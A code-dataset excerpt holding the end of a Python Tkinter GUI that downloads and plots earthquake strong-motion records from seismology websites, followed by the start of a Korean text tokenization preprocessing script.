np.linspace(oz-h/2,oz+h/2,num=10)\r\n x1, z1 = np.meshgrid(x, z)\r\n y11 = np.ones_like(x1)*(oy-w/2)\r\n y12 = np.ones_like(x1)*(oy+w/2)\r\n x2, y2 = np.meshgrid(x, y)\r\n z21 = np.ones_like(x2)*(oz-h/2)\r\n z22 = np.ones_like(x2)*(oz+h/2)\r\n y3, z3 = np.meshgrid(y, z)\r\n x31 = np.ones_like(y3)*(ox-l/2)\r\n x32 = np.ones_like(y3)*(ox+l/2)\r\n \r\n # outside surface\r\n self.ad.plot_wireframe(x1, y11, z1, color='gray') # front\r\n # inside surface\r\n self.ad.plot_wireframe(x1, y12, z1, color='gray') # behind\r\n # bottom surface\r\n self.ad.plot_wireframe(x2, y2, z21, color='gray') # below\r\n # upper surface\r\n self.ad.plot_wireframe(x2, y2, z22, color='gray') # top\r\n # left surface\r\n self.ad.plot_wireframe(x31, y3, z3, color='gray') # left\r\n # right surface\r\n self.ad.plot_wireframe(x32, y3, z3, color='gray') # right\r\n self.ad.set_xlabel('X')\r\n self.ad.set_ylabel('Y')\r\n self.ad.set_zlabel('Z')\r\n\r\n self.chart_type2 = FigureCanvasTkAgg(self.model,model_frame)\r\n self.chart_type2.get_tk_widget().pack(anchor=\"e\",side=TOP)\r\n \r\n self.channel_name.bind('<>', self.showPlot)\r\n \r\n \r\n set_sensors = Button(model_frame,text=\"Set Channels\",command=self.setchannels)\r\n \r\n set_sensors.pack(pady=10)\r\n \r\n def setchannels(self):\r\n \r\n self.coordinate_df[\"X\"] = self.x_list\r\n self.coordinate_df[\"Y\"] = self.y_list\r\n self.coordinate_df[\"Z\"] = self.z_list\r\n self.coordinate_df[\"name\"] = self.n_list\r\n self.coordinate_df[\"directions\"] = self.direc_list\r\n \r\n def updateList(self):\r\n \r\n data_folder = p1_file + \"/Data/\"+ self.data_combobox.get() + \"/\"\r\n data_files = os.listdir(data_folder)\r\n \r\n self.Lb1.delete(0,END)\r\n for i in range(len(data_files)):\r\n \r\n self.Lb1.insert(i, data_files[i])\r\n \r\n \r\n def showData(self):\r\n \r\n # self.data_df = pd.DataFrame()\r\n # self.fs = float()\r\n # self.time = pd.DataFrame()\r\n \r\n self.x_list = []\r\n self.y_list = []\r\n self.z_list = []\r\n self.direc_list = []\r\n \r\n for i in self.Lb1.curselection():\r\n\r\n data_folder = p1_file + \"/Data/\"+ self.data_combobox.get() + \"/\" + self.Lb1.get(i)\r\n data_files = os.listdir(data_folder)\r\n \r\n files = [c for c in data_files if c[-3::] == \".V2\"]\r\n \r\n if len(files) > 1:\r\n \r\n data = read_V2.v2toData(files, data_folder)\r\n data_df = data[0]\r\n \r\n self.fs = data[1]\r\n self.time[\"time\"] = data[2]\r\n \r\n self.channel_name[\"values\"] = list(data_df.columns)\r\n \r\n elif len(files) == 1:\r\n \r\n read_version_V2.versionV2(files)\r\n \r\n for i in data_df:\r\n \r\n self.data_df[i] = data_df[i]\r\n \r\n\r\n self.fs_df[\"fs\"] = [self.fs]\r\n\r\n \r\n def showPlot(self,event):\r\n\r\n self.ax.clear()\r\n self.ax.plot(self.time.values,self.data_df[\"{0}\".format(self.channel_name.get())])\r\n self.ax.set_xlabel(\"Time (s)\")\r\n self.ax.set_ylabel(\"Acceleration (cm/s)\")\r\n self.chart_type.draw()\r\n \r\n \r\n def placeSensor(self):\r\n \r\n x = float(self.X_direction.get())\r\n y = float(self.Y_direction.get())\r\n z = float(self.Z_direction.get())\r\n name = self.channel_name.get()\r\n direct = self.direction.get()\r\n \r\n self.x_list.append(x)\r\n self.y_list.append(y)\r\n self.z_list.append(z)\r\n self.n_list.append(name)\r\n self.direc_list.append(direct)\r\n \r\n place_fig = self.ad.scatter(self.x_list, self.y_list, self.z_list, color='red',lw=6)\r\n \r\n\r\n \r\n self.chart_type2.draw()\r\n \r\nclass mainApplication(tk.Tk):\r\n \r\n def __init__(self):\r\n \r\n super().__init__()\r\n \r\n self.geometry('350x330')\r\n self.title(\"AFU-PY\")\r\n self.resizable(False,False)\r\n \r\n # Data Variable\r\n \r\n self.data_df = pd.DataFrame()\r\n self.fs_df = pd.DataFrame()\r\n self.time = pd.DataFrame()\r\n self.coordinate_df = pd.DataFrame()\r\n \r\n self.station_net = str()\r\n \r\n p1_file = os.path.dirname(os.path.realpath(__file__))\r\n self.files = os.listdir(p1_file)\r\n download_check = [s for s in self.files if \"Download\" in s]\r\n data_check = [s for s in self.files if \"Data\" in s]\r\n self.p1_file = p1_file\r\n \r\n if download_check == []:\r\n \r\n self.download_file = os.mkdir(p1_file+\"/Download\")\r\n self.download_file = p1_file+\"/Download\"\r\n else:\r\n \r\n self.download_file = p1_file+\"/Download\"\r\n \r\n if data_check == []:\r\n \r\n self.data_file = os.mkdir(p1_file+\"/Data\")\r\n self.data_file = p1_file+\"/Data\"\r\n else:\r\n \r\n self.data_file = p1_file+\"/Data\"\r\n \r\n file_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n file_frame.pack(side=LEFT, anchor=NW)\r\n \r\n \r\n file_label = Label(file_frame,text=\"Web Harvesting\",font=(\"Arial\",16,\"underline\"))\r\n file_label.pack(pady=5)\r\n \r\n kandilli_label = Label(file_frame,text=\"KANDILLI\",font=(\"Arial\",12,\"underline\"))\r\n kandilli_label.pack(pady=5)\r\n \r\n self.photo = PhotoImage(file = r\"koeri3d2.gif\")\r\n \r\n kandilli_button = Button(file_frame,image=self.photo,width=200,height=50,command=self.Showkandilli)\r\n kandilli_button.pack()\r\n \r\n kandilli_label = Label(file_frame,text=\"CESMD\",font=(\"Arial\",12,\"underline\"))\r\n kandilli_label.pack(pady=5)\r\n \r\n kandilli_label = Label(file_frame,text=\"Station Network ID (ex. CE24386)\",font=(\"Arial\",10))\r\n kandilli_label.pack(pady=5)\r\n \r\n self.photo2 = PhotoImage(file = r\"cesmd.PNG\")\r\n \r\n \r\n self.station_entry = Entry(file_frame,width=18,justify=\"center\")\r\n self.station_entry.pack()\r\n \r\n cesmd_button = Button(file_frame,image=self.photo2,width=200,height=50,command=self.Showcesmd)\r\n cesmd_button.pack(pady=5)\r\n \r\n downloadevent_button = Button(file_frame,width=15,bg=\"green\",text=\"Download Event\",command=self.download_event)\r\n downloadevent_button.pack(pady=5)\r\n \r\n table_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n table_frame.pack(pady=10)\r\n \r\n table_frame.columnconfigure(0, weight=1)\r\n table_frame.rowconfigure(0, weight=1)\r\n\r\n frmtreeborder = tk.LabelFrame(table_frame,text='Event Table')\r\n \r\n frmtreeborder.columnconfigure(0, weight=1)\r\n frmtreeborder.rowconfigure(0, weight=1)\r\n \r\n self.event_treeview = ttk.Treeview(frmtreeborder,show=\"headings\")\r\n \r\n Hscroll = ttk.Scrollbar(table_frame,orient=tk.HORIZONTAL,command=self.event_treeview.xview)\r\n Vscroll = ttk.Scrollbar(table_frame,orient=tk.VERTICAL,command=self.event_treeview.yview)\r\n self.event_treeview.configure(xscrollcommand=Hscroll.set)\r\n self.event_treeview.configure(yscrollcommand=Vscroll.set)\r\n \r\n frmtreeborder.grid(column=0,row=0,sticky='nsew',padx=6,pady=6)\r\n self.event_treeview.grid(column=0,row=0,sticky='nsew',padx=6,pady=6)\r\n Hscroll.grid(row=1,column=0,sticky='ew')\r\n Vscroll.grid(row=0,column=1,sticky='ns')\r\n \r\n menubar = Menu(self,background='#ff8000', foreground='black', activebackground='white', activeforeground='black')\r\n \r\n menu_Modelling = Menu(menubar, tearoff=0)\r\n menu_Modelling.add_command(label=\"Acceleration\",command=self.showData)\r\n menubar.add_cascade(label=\"Acceleration\", menu=menu_Modelling)\r\n \r\n menu_Analysis = Menu(menubar, tearoff=0)\r\n \r\n menu_Analysis.add_command(label=\"Analysis\",command=self.showAnalysis)\r\n menubar.add_cascade(label=\"Analysis\", menu=menu_Analysis)\r\n \r\n menu_ShowTerm = Menu(menubar, tearoff=0)\r\n \r\n menu_ShowTerm.add_command(label=\"Results\",command=self.showResults)\r\n menubar.add_cascade(label=\"Results\", menu=menu_ShowTerm)\r\n \r\n self.config(menu=menubar)\r\n self.event_treeview.bind('<>', self.item_selected)\r\n \r\n def showAnalysis(self):\r\n \r\n showAnalysiss(self,self.data_df,self.fs_df,self.coordinate_df)\r\n \r\n def showData(self):\r\n \r\n self.data_df = pd.DataFrame()\r\n self.fs = float()\r\n self.time = pd.DataFrame()\r\n showAccData(self,self.station_net,self.data_file,self.data_df,self.fs,self.time,self.fs_df,self.coordinate_df)\r\n \r\n \r\n def showResults(self):\r\n \r\n \r\n resultsPage(self)\r\n \r\n \r\n def Showkandilli(self):\r\n self.geometry('1050x330')\r\n html = \"http://www.koeri.boun.edu.tr/scripts/lst0.asp\"\r\n cont = requests.get(html)\r\n soup = BeautifulSoup(cont.content,\"html.parser\")\r\n table = soup.find(\"pre\").contents[0]\r\n \r\n file = open(\"Kandilli\"+\".txt\",\"w\")\r\n file.writelines(table)\r\n file.close()\r\n \r\n file = open(\"Kandilli\"+\".txt\",\"r\")\r\n text = file.readlines()\r\n file.close()\r\n \r\n data1 = []\r\n\r\n for i in range(14,1016,2):\r\n veriler1 = text[i]\r\n veriler1 = veriler1.split()\r\n data1.append(veriler1)\r\n \r\n del data1[500]\r\n \r\n kandilli_df = pd.DataFrame(data1)\r\n kandilli_df = kandilli_df.rename(columns={0: \"Tarih\", 1: \"Saat\"\r\n ,2: \"Enlem(N)\",\r\n 3:\"Boylam(E)\",4:\"Derinlik(km)\",\r\n 5:\"MD\",6:\"ML\",7:\"Mw\",8:\"Yer\",9:\"Çözüm Niteliği\"})\r\n \r\n \r\n cols = list(kandilli_df.columns)\r\n kandilli_df = kandilli_df[cols[0:9]]\r\n cols = list(kandilli_df.columns)\r\n \r\n for i in self.event_treeview.get_children():\r\n self.event_treeview.delete(i)\r\n \r\n \r\n self.event_treeview[\"columns\"] = cols\r\n \r\n\r\n \r\n for i in cols:\r\n self.event_treeview.column(i, anchor=\"w\",stretch=False)\r\n self.event_treeview.heading(i, text=i, anchor='w')\r\n \r\n for index, row in kandilli_df.iterrows():\r\n self.event_treeview.insert(\"\",0,text=index,values=list(row))\r\n \r\n \r\n \r\n def Showcesmd(self):\r\n \r\n self.geometry('1050x330')\r\n \r\n network = self.station_entry.get()[0:2]\r\n station = self.station_entry.get()[2::]\r\n \r\n link = \"https://www.cesmd.org/cgi-bin/CESMD/Multiplesearch1_DM2.pl?event_name=&magmin=&magmax=&byear=&eyear=&country=Any&state=Any&stn_ident=&network={0}&sta_number={1}&type=Any&Material=Any&Height=&siteclass=Any&accmin=&accmax=&hdistmin=&hdistmax=\".format(network,station)\r\n \r\n pd_table = pd.read_html(link)\r\n \r\n event_table = pd_table[4]\r\n \r\n drop_list = []\r\n \r\n for i in range(len(event_table[\"Station\"].values)):\r\n \r\n \r\n if str(event_table[\"Station\"][i]) == \"nan\":\r\n \r\n drop_list.append(i)\r\n \r\n \r\n event_table = event_table.drop(axis=1,index=drop_list)\r\n event_table = event_table.reset_index(drop=True)\r\n \r\n cols = list(event_table.columns)\r\n \r\n for i in self.event_treeview.get_children():\r\n self.event_treeview.delete(i)\r\n \r\n self.event_treeview[\"columns\"] = cols\r\n \r\n for i in cols:\r\n self.event_treeview.column(i, anchor=\"w\",stretch=False)\r\n self.event_treeview.heading(i, text=i, anchor='w')\r\n \r\n for index, row in event_table.iterrows():\r\n self.event_treeview.insert(\"\",0,text=index,values=list(row))\r\n \r\n def item_selected(self,event):\r\n \r\n self.curItems = self.event_treeview.selection()\r\n \r\n self.event_list = []\r\n self.event_name = []\r\n for i in self.curItems:\r\n \r\n a = self.event_treeview.item(i)['values']\r\n self.event_name.append(a[7])\r\n self.event_list.append(a[10])\r\n \r\n def download_event(self):\r\n \r\n download_check = [s for s in self.files if \"Download\" in s]\r\n\r\n if download_check == []:\r\n \r\n self.download_file = os.mkdir(self.p1_file+\"/Download\")\r\n self.download_file = self.p1_file+\"/Download\"\r\n else:\r\n \r\n self.download_file = self.p1_file+\"/Download\"\r\n \r\n chunk_size = 128\r\n station_net = self.station_entry.get()\r\n self.station_net = station_net\r\n self.save_list = []\r\n for i,name in zip(self.event_list,self.event_name):\r\n \r\n \r\n url = \"https://www.strongmotioncenter.org/wserv/records/query?eventid={0}&stcode={1}&orderby=epidist-asc&rettype=dataset&download=P&email=&groupby=station&nodata=404\".format(i,station_net)\r\n \r\n r = requests.get(url, stream=True)\r\n save_path = self.download_file +\"/\" + str(name) + \"_\" + str(i) +\".zip\"\r\n event_name = str(name) + \"_\" + str(i)\r\n self.save_list.append(save_path)\r\n with open(save_path, 'wb') as fd:\r\n for chunk in r.iter_content(chunk_size=chunk_size):\r\n fd.write(chunk)\r\n \r\n \r\n \r\n for i,file in zip(self.save_list,self.event_name):\r\n \r\n try: \r\n \r\n zip_file = i\r\n with zipfile.ZipFile(zip_file, 'r') as zip_ref:\r\n zip_ref.extractall(i.split(\".zip\")[0])\r\n \r\n zip_ref.close()\r\n \r\n new_file = os.listdir(i.split(\".zip\")[0])\r\n enter_file = i.split(\".zip\")[0] + \"/\"+ new_file[0]\r\n new_file2 = os.listdir(enter_file)\r\n enter_file2 = enter_file +\"/\" +new_file2[0]\r\n zip_file = os.listdir(enter_file2)\r\n \r\n zip_file = enter_file2 + \"/\" + zip_file[0]\r\n with zipfile.ZipFile(zip_file, 'r') as zip_ref:\r\n zip_ref.extractall(enter_file2 + \"/\" + file)\r\n \r\n zip_ref.close()\r\n \r\n afu_data = self.data_file + \"/\"+ station_net +\"/\" + file\r\n shutil.move(enter_file2 + \"/\" + file, afu_data)\r\n except zipfile.BadZipfile:\r\n \r\n pass\r\n \r\n \r\n shutil.rmtree(self.download_file)\r\n \r\n\r\n \r\n \r\n \r\n \r\nmainApplication().mainloop() \r\n", "repo_name": "afugur/AFU-PY-GUI", "sub_path": "AFU-PY-Gui/Gui.py", "file_name": "Gui.py", "file_ext": "py", "file_size_in_byte": 34819, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 26, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 54, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 193, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 210, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 210, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 212, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 233, "usage_type": "call"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 242, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 257, "usage_type": "call"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 265, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 265, "usage_type": "name"}, {"api_name": "Libraries.calc_modeshape.calcModeShape", "line_number": 286, "usage_type": "call"}, {"api_name": "Libraries.calc_modeshape", "line_number": 286, "usage_type": "name"}, {"api_name": "Libraries.modeshape_interpolate.modeshapeInterpolate", "line_number": 296, "usage_type": "call"}, {"api_name": "Libraries.modeshape_interpolate", "line_number": 296, "usage_type": "name"}, {"api_name": "Libraries.draw_maxmodeshape.modeshapeSensorDrawing", "line_number": 303, "usage_type": "call"}, {"api_name": "Libraries.draw_maxmodeshape", "line_number": 303, "usage_type": "name"}, {"api_name": "Libraries.draw_minmodeshape.modeshapeSensorDrawing", "line_number": 308, "usage_type": "call"}, {"api_name": "Libraries.draw_minmodeshape", "line_number": 308, "usage_type": "name"}, {"api_name": "Libraries.calcFdd.calcFDD", "line_number": 320, "usage_type": "call"}, {"api_name": "Libraries.calcFdd", "line_number": 320, "usage_type": "name"}, {"api_name": "Libraries.half_power.dampHalf", "line_number": 338, "usage_type": "call"}, {"api_name": "Libraries.half_power", "line_number": 338, "usage_type": "name"}, {"api_name": "Libraries.log_damp.dampLog", "line_number": 339, "usage_type": "call"}, {"api_name": "Libraries.log_damp", "line_number": 339, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 341, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 368, "usage_type": "call"}, {"api_name": "Libraries.calc_Drift.calcDrift", "line_number": 393, "usage_type": "call"}, {"api_name": "Libraries.calc_Drift", "line_number": 393, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 405, "usage_type": "attribute"}, {"api_name": "tkinter.Toplevel", "line_number": 409, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 439, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 441, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 441, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 457, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 461, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 466, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 497, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 497, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 524, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 529, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 532, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_tkagg.FigureCanvasTkAgg", "line_number": 552, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 573, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 595, "usage_type": "call"}, {"api_name": "Libraries.read_V2.v2toData", "line_number": 601, "usage_type": "call"}, {"api_name": "Libraries.read_V2", "line_number": 601, "usage_type": "name"}, {"api_name": "Libraries.read_version_V2.versionV2", "line_number": 611, "usage_type": "call"}, {"api_name": "Libraries.read_version_V2", "line_number": 611, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 650, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 662, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 663, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 664, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 665, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 669, "usage_type": "call"}, {"api_name": "os.path", "line_number": 669, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 669, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 670, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 677, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 685, "usage_type": "call"}, {"api_name": "tkinter.LabelFrame", "line_number": 730, "usage_type": "call"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 735, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 735, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 737, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 737, "usage_type": "name"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 737, "usage_type": "attribute"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 738, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 738, "usage_type": "name"}, {"api_name": "tkinter.VERTICAL", "line_number": 738, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 772, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 774, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 787, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 788, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 808, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 845, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 894, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 909, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 924, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 929, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 931, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 933, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 936, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 942, "usage_type": "call"}, {"api_name": "zipfile.BadZipfile", "line_number": 943, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 948, "usage_type": "call"}]} +{"seq_id": "40077469685", "text": "from hangul_utils import split_syllables\nfrom konlpy.tag import Mecab\nfrom tqdm import tqdm\nfrom utils import file_to_list, folder_check, save_pkl, save_npz, set_logger\nimport numpy as np\nimport random\nimport re\nimport argparse\n\n\ndef text_to_phoneme(text, save_dir):\n logger = set_logger('phoneme-process')\n sp_text = []\n hangul = re.compile('[^\\u3131-\\u3163\\uac00-\\ud7a3]+')\n for split in text:\n review = hangul.sub(' ', split_syllables(split))\n if len(review) != 0:\n sp_text.append(review)\n\n unq_phoneme = []\n logger.info('Set Dictionary.')\n\n for line in tqdm(sp_text):\n for phoneme in line:\n if phoneme not in unq_phoneme:\n unq_phoneme.append(phoneme)\n\n logger.info('# of unique Phoneme : {}\\nexample : {}'.format(len(unq_phoneme), unq_phoneme[:50]))\n\n phoneme_label = {ch: i + 1 for i, ch in enumerate(unq_phoneme)}\n label_phoneme = {i + 1: ch for i, ch in enumerate(unq_phoneme)}\n\n x = np.asarray([[phoneme_label[w] for w in sent if w in phoneme_label.keys()] for sent in sp_text])\n y_neg = [[1, 0] for _ in range(45000)]\n y_pos = [[0, 1] for _ in range(45000)]\n y = np.asarray(y_neg + y_pos)\n\n np.random.seed(618);\n np.random.shuffle(x)\n np.random.seed(618);\n np.random.shuffle(y)\n\n # Check Folder\n folder_check(dir_path=save_dir, dir_name='npz')\n folder_check(dir_path=save_dir, dir_name='dictionary')\n\n # Save Array & Dictionary\n save_npz(npz_path=save_dir + '/npz', npz_name='x_phoneme.npz', arr=x)\n save_npz(npz_path=save_dir + '/npz', npz_name='y_phoneme.npz', arr=y)\n save_pkl(pkl_path=save_dir + '/dictionary', pkl_name='dictionary_phoneme.pkl', save_object=label_phoneme)\n\n return None\n\n\ndef text_to_morpheme(text, save_dir):\n logger = set_logger('morpheme-process')\n mc = Mecab()\n sp_text = []\n for line in text:\n sp_text.append(mc.morphs(line))\n\n unq_morpheme = []\n\n logger.info('Set Dictionary.')\n\n for line in tqdm(sp_text):\n for morpheme in line:\n if morpheme not in unq_morpheme:\n unq_morpheme.append(morpheme)\n\n logger.info('# of unique Morpheme : {}\\texample : {}'.format(len(unq_morpheme), random.sample(unq_morpheme, 50)))\n\n all_morphemes = []\n hangul = re.compile('[-=.#/?:^~!$}0-9]')\n\n for line in tqdm(sp_text):\n for morpheme in line:\n morpheme = hangul.sub('', morpheme)\n if morpheme:\n all_morphemes.append(morpheme)\n\n morpheme_count = {}\n for morpheme in all_morphemes:\n if morpheme in morpheme_count:\n morpheme_count[morpheme] += 1\n else:\n morpheme_count[morpheme] = 1\n\n sorted_morpheme = sorted([(k, v) for k, v in morpheme_count.items()],\n key=lambda morpheme_count: -morpheme_count[1])[:10000]\n\n label_morpheme = {i + 1: ch[0] for i, ch in enumerate(sorted_morpheme)}\n morpheme_label = {y: x for x, y in label_morpheme.items()}\n\n x = np.asarray([[morpheme_label[w] for w in sent if w in morpheme_label.keys()] for sent in sp_text])\n\n y_neg = [[1, 0] for _ in range(45000)]\n y_pos = [[0, 1] for _ in range(45000)]\n y = np.asarray(y_neg + y_pos)\n\n np.random.seed(618);\n np.random.shuffle(x)\n np.random.seed(618);\n np.random.shuffle(y)\n\n # Check Folder\n folder_check(dir_path=save_dir, dir_name='npz')\n folder_check(dir_path=save_dir, dir_name='dictionary')\n\n # Save Array & Dictionary\n save_npz(npz_path=save_dir + '/npz', npz_name='x_morpheme.npz', arr=x)\n save_npz(npz_path=save_dir + '/npz', npz_name='y_morpheme.npz', arr=y)\n save_pkl(pkl_path=save_dir + '/dictionary', pkl_name='dictionary_morpheme.pkl', save_object=label_morpheme)\n\n return None\n\n\ndef text_to_word(text, save_dir):\n logger = set_logger('word-process')\n sp_text = []\n for i in range(len(text)):\n sp_text.append(text[i].split())\n\n unq_word = []\n\n logger.info('Set Dictionary.')\n\n for line in tqdm(sp_text):\n for word in line:\n if word not in unq_word:\n unq_word.append(word)\n\n logger.info('# of unique Word : {}\\texample : {}'.format(len(unq_word), random.sample(unq_word, 50)))\n\n all_words = []\n hangul = re.compile('[-=.#/?:^~!$}0-9]')\n\n for line in tqdm(sp_text):\n for word in line:\n word = hangul.sub('', word)\n if word:\n all_words.append(word)\n\n word_count = {}\n for word in all_words:\n if word in word_count:\n word_count[word] += 1\n else:\n word_count[word] = 1\n sorted_words = sorted([(k, v) for k, v in word_count.items()],\n key=lambda word_count: -word_count[1])[:40000]\n\n label_word = {i + 1: ch[0] for i, ch in enumerate(sorted_words)}\n word_label = {y: x for x, y in label_word.items()}\n\n x = np.asarray([[word_label[w] for w in sent if w in word_label.keys()] for sent in sp_text])\n\n y_neg = [[1, 0] for _ in range(45000)]\n y_pos = [[0, 1] for _ in range(45000)]\n y = np.asarray(y_neg + y_pos)\n\n np.random.seed(618);\n np.random.shuffle(x)\n np.random.seed(618);\n np.random.shuffle(y)\n\n # Check Folder\n folder_check(dir_path=save_dir, dir_name='npz')\n folder_check(dir_path=save_dir, dir_name='dictionary')\n\n # Save Array & Dictionary\n save_npz(npz_path=save_dir + '/npz', npz_name='x_word.npz', arr=x)\n save_npz(npz_path=save_dir + '/npz', npz_name='y_word.npz', arr=y)\n save_pkl(pkl_path=save_dir + '/dictionary', pkl_name='dictionary_word.pkl', save_object=label_word)\n\n return None\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Preprocess')\n parser.add_argument('--token-type', type=str, required=True,\n help='set token type (phoneme, morpheme, word')\n 